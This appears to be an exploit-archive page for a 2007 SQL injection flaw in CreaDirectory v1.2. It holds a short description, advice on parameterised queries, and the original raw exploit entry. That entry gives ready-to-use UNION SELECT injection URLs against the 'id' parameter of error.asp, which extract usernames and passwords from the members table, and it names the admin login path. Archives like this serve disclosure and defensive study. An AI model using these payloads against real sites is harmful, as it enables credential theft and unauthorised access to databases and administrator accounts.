header-logo
Suggest Exploit
vendor:
by:
CyberGhost
5.5
CVSS
MEDIUM
Remote SQL Injection
89
CWE
Product Name:
Affected Version From: CreaDirectory v1.2
Affected Version To: CreaDirectory v1.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

CreaDirectory v1.2 Remote SQL Injection Vulnerability

The CreaDirectory v1.2 script is vulnerable to remote SQL injection. An attacker can exploit this vulnerability to execute arbitrary SQL commands and retrieve sensitive information from the database. The vulnerability exists in the 'error.asp' page, where the 'id' parameter is not properly sanitized before being used in a SQL query.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input before using it in SQL queries. Additionally, implementing parameterized queries or prepared statements can also help prevent SQL injection attacks.
Source

Exploit-DB raw data:

#Title  : CreaDirectory v1.2 Remote SQL Injection Vulnerability
#Author : CyberGhost
#Demo Page   : http://www.creadirectory.com
#Script Page : http://www.creascripts.com/creadirectory.asp

#Vuln.

#Username : /error.asp?id=-1+union+select+0,1,2,user_name,4,5,6,7,8,9,0,1,2,3,4,5+from+members
#Password : /error.asp?id=-1+union+select+0,1,2,ipassword,4,5,6,7,8,9,0,1,2,3,4,5+from+members

#Admin Login : /admin.asp

#Info : Username and Password in browser title !
====================================

Thanx : redLine - Hackinger - excellance - Liarhack - SaCReD SeeR - MaTRax - KinSize - BolivaR - kerem125 - by_emR3

And All TURKISH HACKERS !

# milw0rm.com [2007-04-19]

Navigation

Suggest Exploit

Services By CQR